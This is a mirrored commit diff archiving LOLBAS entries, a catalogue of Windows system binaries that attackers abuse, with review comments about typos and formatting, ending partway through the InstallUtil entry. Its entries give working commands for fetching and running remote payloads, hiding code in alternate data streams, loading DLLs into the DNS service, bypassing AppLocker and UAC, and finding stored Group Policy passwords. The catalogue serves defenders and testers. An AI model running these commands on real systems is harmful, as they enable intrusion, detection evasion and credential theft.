mirror of
				https://github.com/LOLBAS-Project/LOLBAS
				synced 2025-10-25 06:45:41 +02:00 
	Removed MD files, we only use the webportal from now on. All MD files moved to archive
18 Archive-Old-Version/OSBinaries/Atbroker.exe.md Normal file
							| @@ -0,0 +1,18 @@ | ||||
| ## Atbroker.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| ATBroker.exe /start malware | ||||
| Start a registered Assistive Technology (AT). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\Atbroker.exe | ||||
|   * C:\Windows\SysWOW64\Atbroker.exe | ||||
|     | ||||
| * Notes: Thanks to Adam - @hexacorn Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. | ||||
|    | ||||
|     | ||||
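Review bot: typo on the Notes line, "Assistibe Technology" should be "Assistive Technology", and the example `ATBroker.exe /start malware` gives no hint that "malware" stands for the name of a registered AT, which the Notes line says must already exist in the registry. Suggest a placeholder such as `<registered AT name>` plus one sentence tying the /start argument to that registry entry, since the registry modification is the part a defender would watch for.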
16 Archive-Old-Version/OSBinaries/Bash.exe.md Normal file
							| @@ -0,0 +1,16 @@ | ||||
| ## Bash.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| bash.exe -c calc.exe | ||||
| Execute calc.exe. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   *  | ||||
|     | ||||
| * Full path:    | ||||
|   * ? | ||||
|     | ||||
| * Notes: Thanks to ?   | ||||
|     | ||||
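Review bot: this entry is a stub: the Resources bullet is empty, Full path is `?` and Notes reads "Thanks to ?". Archiving it as-is preserves an unverified record; either fill in the path and a reference or mark the file explicitly as incomplete so readers do not treat the empty fields as verified.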
40 Archive-Old-Version/OSBinaries/Bitsadmin.exe.md Normal file
							| @@ -0,0 +1,40 @@ | ||||
| ## Bitsadmin.exe | ||||
| * Functions: Execute, Download, Copy, Read ADS | ||||
| ``` | ||||
|  | ||||
| bitsadmin /create 1 | ||||
| bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe | ||||
| bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL | ||||
| bitsadmin /RESUME 1 | ||||
| bitsadmin /complete 1 | ||||
|  | ||||
|  | ||||
|  | ||||
|  | ||||
| Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
|  | ||||
| bitsadmin /create 1 | ||||
| bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe | ||||
| bitsadmin /RESUME 1 | ||||
| bitsadmin /complete 1 | ||||
|  | ||||
| Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
|  | ||||
| bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset | ||||
| One-liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
|  | ||||
| bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset | ||||
| One-Liner version that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - Slide 53 | ||||
|   * https://www.youtube.com/watch?v=_8xJaaQlpBo | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\Windows\System32\bitsadmin.exe | ||||
|   * c:\Windows\SysWOW64\bitsadmin.exe | ||||
|     | ||||
| * Notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
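Review bot: the description under the second example (`bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe ...`) is a copy of the first one and is wrong: that job downloads autoruns.exe and has no `/SetNotifyCmdLine` step, so it should read something like "Create a job named 1, download autoruns.exe to c:\data\playfolder, then resume and complete the job." The same mismatch applies to the first one-liner, which copies cmd.exe but sets no notify command. Also drop the four stray blank lines after the first `bitsadmin /complete 1`.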
26 Archive-Old-Version/OSBinaries/Certutil.exe.md Normal file
							| @@ -0,0 +1,26 @@ | ||||
| ## Certutil.exe | ||||
| * Functions: Download, Add ADS, Decode, Encode | ||||
| ``` | ||||
|  | ||||
| certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe | ||||
| Download and save 7zip to disk in the current folder. | ||||
|  | ||||
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | ||||
| Download and save a PS1 file to an Alternate Data Stream (ADS). | ||||
|  | ||||
| certutil -encode inputFileName encodedOutputFileName | ||||
| certutil -decode encodedInputFileName decodedOutputFileName | ||||
|  | ||||
| Commands to encode and decode a file using Base64. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/Moriarty_Meng/status/984380793383370752 | ||||
|   * https://twitter.com/mattifestation/status/620107926288515072 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\certutil.exe | ||||
|   * c:\windows\sysWOW64\certutil.exe | ||||
|     | ||||
| * Notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016   | ||||
|     | ||||
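Review bot: the encode/decode pair is separated from its description by a blank line, unlike every other command/description pair in the block; move "Commands to encode and decode a file using Base64." directly under `certutil -decode ...`. The contributor handle in Notes (`@Moriarty2016`) also differs from the one in the resource link (`Moriarty_Meng`); confirm which is intended.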
17 Archive-Old-Version/OSBinaries/Cmdkey.exe.md Normal file
							| @@ -0,0 +1,17 @@ | ||||
| ## Cmdkey.exe | ||||
| * Functions: Credentials | ||||
| ``` | ||||
|  | ||||
| cmdkey /list | ||||
| List cached credentials. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\cmdkey.exe | ||||
|   * c:\windows\sysWOW64\cmdkey.exe | ||||
|     | ||||
| * Notes:    | ||||
|     | ||||
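Review bot: the Notes line is empty although every other entry in this commit records the contributor there; add the attribution (the linked blog post is the obvious source) or remove the empty field, and say in Notes what `/list` actually outputs so the "Credentials" function tag is understood.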
25 Archive-Old-Version/OSBinaries/Cmstp.exe.md Normal file
							| @@ -0,0 +1,25 @@ | ||||
| ## Cmstp.exe | ||||
| * Functions: Execute, UACBypass | ||||
| ``` | ||||
|  | ||||
| cmstp.exe /ni /s c:\cmstp\CorpVPN.inf | ||||
| Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||||
|  | ||||
| cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf | ||||
| Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/NickTyrer/status/958450014111633408 | ||||
|   * https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 | ||||
|   * https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e | ||||
|   * https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ | ||||
|   * https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 (UAC Bypass) | ||||
|   * https://github.com/hfiref0x/UACME | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\system32\cmstp.exe | ||||
|   * C:\Windows\sysWOW64\cmstp.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer   | ||||
|     | ||||
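Review bot: `UACBypass` is listed under Functions but neither example nor the Notes line describes it; the only trace is the "(UAC Bypass)" annotation on a resource link, so either document the tag in Notes or drop it until it is explained. Grammar: "a UnRegisterOCXSection section" should be "an UnRegisterOCXSection section" in both descriptions. The second example also hard-codes a raw.githubusercontent.com URL into the api0cradle/LOLBAS master branch (`OSBinaries/Payload/Cmstp.inf`); with this very commit moving the MD files into `Archive-Old-Version`, such paths are likely to go stale, so mark it as an external resource or reference the payload by a repository-relative path.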
20 Archive-Old-Version/OSBinaries/Control.exe.md Normal file
							| @@ -0,0 +1,20 @@ | ||||
| ## Control.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| control.exe c:\windows\tasks\file.txt:evil.dll | ||||
| Execute evil.dll which is stored in an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ | ||||
|   * https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ | ||||
|   * https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ | ||||
|   * https://twitter.com/bohops/status/955659561008017409 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\system32\control.exe     | ||||
|   * C:\Windows\sysWOW64\control.exe      | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops   | ||||
|     | ||||
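Review bot: style only: the two Full path bullets have trailing whitespace after `control.exe`, unlike the other entries in this commit; trim it so the archived files are consistent.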
21 Archive-Old-Version/OSBinaries/Csc.exe.md Normal file
							| @@ -0,0 +1,21 @@ | ||||
| ## Csc.exe | ||||
| * Functions: Compile | ||||
| ``` | ||||
|  | ||||
| csc -out:My.exe File.cs | ||||
| Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. | ||||
|  | ||||
| csc -target:library File.cs | ||||
|  | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe | ||||
|   *  | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe | ||||
|     | ||||
| * Notes: Thanks to ?   | ||||
|     | ||||
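Review bot: the second command, `csc -target:library File.cs`, has no description and is followed by a stray blank line, the Resources list has an empty bullet, and Notes reads "Thanks to ?". Add a description such as "Compile File.cs into a DLL" (that is what -target:library produces), remove the empty bullet, and resolve the placeholder attribution.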
18 Archive-Old-Version/OSBinaries/Cscript.exe.md Normal file
							| @@ -0,0 +1,18 @@ | ||||
| ## Cscript.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| cscript c:\ads\file.txt:script.vbs | ||||
| Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\cscript.exe | ||||
|   * c:\windows\sysWOW64\cscript.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
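Review bot: typo in the description: "exectute" should be "execute".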
19 Archive-Old-Version/OSBinaries/Dfsvc.exe.md Normal file
							| @@ -0,0 +1,19 @@ | ||||
| ## Dfsvc.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Missing Example | ||||
|  | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe      | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe     | ||||
|   * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe     | ||||
|   * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe     | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
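Review bot: the command block contains only the placeholder "Missing Example", so the Execute tag is not supported by anything in the file; either add the usage from the ShmooCon PDF listed under Resources or mark the entry as pending so it is not mistaken for a documented technique. The Full path bullets also carry trailing whitespace.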
20 Archive-Old-Version/OSBinaries/Diskshadow.exe.md Normal file
							| @@ -0,0 +1,20 @@ | ||||
| ## Diskshadow.exe | ||||
| * Functions: Execute, Dump NTDS.dit | ||||
| ``` | ||||
|  | ||||
| diskshadow.exe /s c:\test\diskshadow.txt | ||||
| Execute commands using diskshadow.exe from a prepared diskshadow script. | ||||
|  | ||||
| diskshadow> exec calc.exe | ||||
| Execute a calc.exe using diskshadow.exe. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\diskshadow.exe | ||||
|   * c:\windows\sysWOW64\diskshadow.exe | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops   | ||||
|     | ||||
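Review bot: `diskshadow> exec calc.exe` is an interactive-prompt line mixed into a list of shell commands, which breaks the command/description pairing; label it as entered at the diskshadow prompt, or present it as the content of the script file referenced by `/s c:\test\diskshadow.txt`. "Dump NTDS.dit" is also listed under Functions without any example or note; the linked bohops post is the only support, so say so in Notes.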
26 Archive-Old-Version/OSBinaries/Dnscmd.exe.md Normal file
							| @@ -0,0 +1,26 @@ | ||||
| ## Dnscmd.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll | ||||
| Adds a specially crafted DLL as a plug-in of the DNS Service. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 | ||||
|   * https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html | ||||
|   * https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp | ||||
|   * https://twitter.com/Hexacorn/status/994000792628719618 | ||||
|   * http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Dnscmd.exe | ||||
|   * c:\windows\sysWOW64\Dnscmd.exe | ||||
|     | ||||
| * Notes: This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the refference links for DLL details. | ||||
| Thanks to Shay Ber - ?, | ||||
| Dimitrios Slamaris - @dim0x69, | ||||
| Nikhil SamratAshok, | ||||
| Mittal - @nikhil_mitt | ||||
|    | ||||
|     | ||||
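Review bot: typo in Notes, "refference" should be "reference". The attribution list is broken across lines in a way that splits one contributor in two: "Nikhil SamratAshok," and "Mittal - @nikhil_mitt" belong on a single line. The example also embeds a literal RFC 1918 address (`\\192.168.0.149\dll\wtf.dll`) where the other entries use placeholders such as `\\webdavserver`; use a placeholder for consistency.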
32 Archive-Old-Version/OSBinaries/Esentutl.exe.md Normal file
							| @@ -0,0 +1,32 @@ | ||||
| ## Esentutl.exe | ||||
| * Functions: Copy, Download, Write ADS, Read ADS | ||||
| ``` | ||||
|  | ||||
| esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o | ||||
| Copies the source VBS file to the destination VBS file. | ||||
|  | ||||
| esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
| Copies the source EXE to an Alternate Data Stream (ADS) of the destination file. | ||||
|  | ||||
| esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o | ||||
| Copies the source Alternate Data Stream (ADS) to the destination EXE. | ||||
|  | ||||
| esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.txt:file.exe /o | ||||
| Copies the source EXE to the destination Alternate Data Stream (ADS) of the destination file. | ||||
|  | ||||
| esentutl.exe /y \\82.221.113.85\webdav\file.exe /d c:\ADS\file.exe /o | ||||
| Copies the source EXE to the destination EXE file. | ||||
|  | ||||
| esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o | ||||
| Copies the source EXE to the destination EXE file | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/egre55/status/985994639202283520 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\esentutl.exe | ||||
|   * c:\windows\sysWOW64\esentutl.exe | ||||
|     | ||||
| * Notes: Thanks to egre55 - @egre55   | ||||
|     | ||||
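Review bot: the two WebDAV examples hard-code a public IP address (`\\82.221.113.85\webdav\file.exe`) whereas the last example uses the placeholder `\\otherwebdavserver`; replace the literal address with a placeholder so the archive does not point at a specific host. Minor: the final description lacks the trailing period the others have.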
24 Archive-Old-Version/OSBinaries/Expand.exe.md Normal file
							| @@ -0,0 +1,24 @@ | ||||
| ## Expand.exe | ||||
| * Functions: Download, Copy, Add ADS | ||||
| ``` | ||||
|  | ||||
| expand \\webdav\folder\file.bat c:\ADS\file.bat | ||||
| Copies source file to destination. | ||||
|  | ||||
| expand c:\ADS\file1.bat c:\ADS\file2.bat | ||||
| Copies source file to destination. | ||||
|  | ||||
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat | ||||
| Copies source file to destination Alternate Data Stream (ADS). | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/infosecn1nja/status/986628482858807297 | ||||
|   * https://twitter.com/Oddvarmoe/status/986709068759949319 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Expand.exe | ||||
|   * c:\windows\sysWOW64\Expand.exe | ||||
|     | ||||
| * Notes: Thanks to Rahmat Nurfauzi - @infosecn1nja, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
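Review bot: the first two descriptions are identical ("Copies source file to destination.") although only the first example copies from a WebDAV share and is what justifies the Download tag; distinguish them, e.g. "Copies the file from the WebDAV share to the local path." for the first one.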
17 Archive-Old-Version/OSBinaries/Explorer.exe.md Normal file
							| @@ -0,0 +1,17 @@ | ||||
| ## Explorer.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| explorer.exe calc.exe | ||||
| Executes calc.exe as a subprocess of explorer.exe. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/bohops/status/986984122563391488 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\explorer.exe | ||||
|   * c:\windows\sysWOW64\explorer.exe | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops   | ||||
|     | ||||
17 Archive-Old-Version/OSBinaries/Extexport.exe.md Normal file
							| @@ -0,0 +1,17 @@ | ||||
| ## Extexport.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Extexport.exe c:\test foo bar | ||||
| Load a DLL located in the c:\\test folder with one of the following names: mozcrt19.dll, mozsqlite3.dll, or sqlite.dll | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Program Files\Internet Explorer\Extexport.exe     | ||||
|   * C:\Program Files\Internet Explorer(x86)\Extexport.exe | ||||
|     | ||||
| * Notes: Thanks to Adam - @hexacorn   | ||||
|     | ||||
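Review bot: the second Full path bullet, `C:\Program Files\Internet Explorer(x86)\Extexport.exe`, is malformed; the 32-bit location on a 64-bit system is `C:\Program Files (x86)\Internet Explorer\Extexport.exe`. The description also writes `c:\\test` with a doubled backslash while the command uses `c:\test`; use the single backslash (or backticks) so the rendered path matches the command.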
25 Archive-Old-Version/OSBinaries/Extrac32.exe.md Normal file
							| @@ -0,0 +1,25 @@ | ||||
| ## Extrac32.exe | ||||
| * Functions: Add ADS, Download | ||||
| ``` | ||||
|  | ||||
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | ||||
| Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. | ||||
|  | ||||
| extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe | ||||
| Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. | ||||
|  | ||||
| extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt | ||||
| Copy the source file to the destination file and overwrite it. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   * https://twitter.com/egre55/status/985994639202283520 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\extrac32.exe | ||||
|   * c:\windows\sysWOW64\extrac32.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe, egre55 - @egre55   | ||||
|     | ||||
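Review bot: the third example (`extrac32 /Y /C ...`) is a plain file copy, but Functions only lists "Add ADS, Download"; add "Copy". The first two descriptions are also identical even though only the second pulls the CAB from a WebDAV share, so say which one is the download case.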
24 Archive-Old-Version/OSBinaries/Findstr.exe.md Normal file
							| @@ -0,0 +1,24 @@ | ||||
| ## Findstr.exe | ||||
| * Functions: Add ADS, Search | ||||
| ``` | ||||
|  | ||||
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe | ||||
| Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|  | ||||
| findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe | ||||
| Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|  | ||||
| findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml | ||||
| Search for stored password in Group Policy files stored on SYSVOL. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\findstr.exe | ||||
|   * c:\windows\sysWOW64\findstr.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
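Review bot: the first two descriptions are run-on sentences; "Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written ..." reads better as "Searches for the string W3AllLov3DonaldTrump; because no line matches, /V causes every line of file.exe to be written to an Alternate Data Stream of file.txt." The third example introduces `<FQDN>` twice without saying that both occurrences are the same domain name; one sentence in Notes would avoid confusion.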
22 Archive-Old-Version/OSBinaries/Forfiles.exe.md Normal file
							| @@ -0,0 +1,22 @@ | ||||
| ## Forfiles.exe | ||||
| * Functions: Execute, Read ADS | ||||
| ``` | ||||
|  | ||||
| forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | ||||
| Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder. | ||||
|  | ||||
| forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" | ||||
| Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/vector_sec/status/896049052642533376 | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\system32\forfiles.exe | ||||
|   * C:\Windows\sysWOW64\forfiles.exe | ||||
|     | ||||
| * Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
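Review bot: "(AD)" in the second description should be "(ADS)", and both descriptions write the folder as `c:\\windows\\System32` with doubled backslashes while the commands use single ones; normalise to the command form.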
22 Archive-Old-Version/OSBinaries/Gpscript.exe.md Normal file
							| @@ -0,0 +1,22 @@ | ||||
| ## Gpscript.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| Gpscript /logon | ||||
| Executes logon scripts configured in Group Policy. | ||||
|  | ||||
| Gpscript /startup | ||||
| Executes startup scripts configured in Group Policy. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\gpscript.exe | ||||
|   * c:\windows\sysWOW64\gpscript.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
| Requires administrative rights and modifications to local group policy settings. | ||||
|    | ||||
|     | ||||
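Review bot: the caveat "Requires administrative rights and modifications to local group policy settings." is the most important line in the file for anyone assessing this entry, yet it sits after the thank-you line; put it first in Notes so the Execute tag is read in context.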
17 Archive-Old-Version/OSBinaries/IEExec.exe.md Normal file
							| @@ -0,0 +1,17 @@ | ||||
| ## IEExec.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| ieexec.exe http://x.x.x.x:8080/bypass.exe | ||||
| Executes bypass.exe from the remote server. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\ieexec.exe | ||||
|   * c:\windows\sysWOW64\ieexec.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee   | ||||
|     | ||||
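Review bot: Full path lists `c:\windows\system32\ieexec.exe` and `c:\windows\sysWOW64\ieexec.exe`, but the other .NET-hosted entries in this commit (Dfsvc, InstallUtil) are listed under `C:\Windows\Microsoft.NET\Framework\...`; verify where ieexec.exe is actually installed before archiving these paths, since path-based detections depend on them.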
19 Archive-Old-Version/OSBinaries/Ie4unit.exe.md Normal file
							| @@ -0,0 +1,19 @@ | ||||
| ## Ie4unit.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| ie4unit.exe -BaseSettings | ||||
| Executes commands from a specially prepared ie4uinit.inf file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\ie4unit.exe     | ||||
|   * c:\windows\sysWOW64\ie4unit.exe     | ||||
|   * c:\windows\system32\ieuinit.inf     | ||||
|   * c:\windows\sysWOW64\ieuinit.inf     | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops   | ||||
|     | ||||
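Review bot: the name is spelt three ways in this file: the heading, command and Full path use `ie4unit.exe`, the description refers to `ie4uinit.inf`, and the Full path bullets list `ieuinit.inf`. Pick one spelling for the executable and one for the INF file and use them consistently; the two `.inf` entries are also not binaries and belong in Notes rather than under Full path.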
19 Archive-Old-Version/OSBinaries/InfDefaultInstall.exe.md Normal file
							| @@ -0,0 +1,19 @@ | ||||
| ## InfDefaultInstall.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| InfDefaultInstall.exe Infdefaultinstall.inf | ||||
| Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   * https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
|   * https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Infdefaultinstall.exe | ||||
|   * c:\windows\sysWOW64\Infdefaultinstall.exe | ||||
|     | ||||
| * Notes: Thanks to Kyle Hanslovan - @kylehanslovan   | ||||
|     | ||||
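Review bot: grammar in the description: "from a command in entered into a specially prepared INF file" should be "from a command entered into a specially prepared INF file".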
24 Archive-Old-Version/OSBinaries/InstallUtil.exe.md Normal file
							| @@ -0,0 +1,24 @@ | ||||
| ## InstallUtil.exe | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
| Execute the target .NET DLL or EXE. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
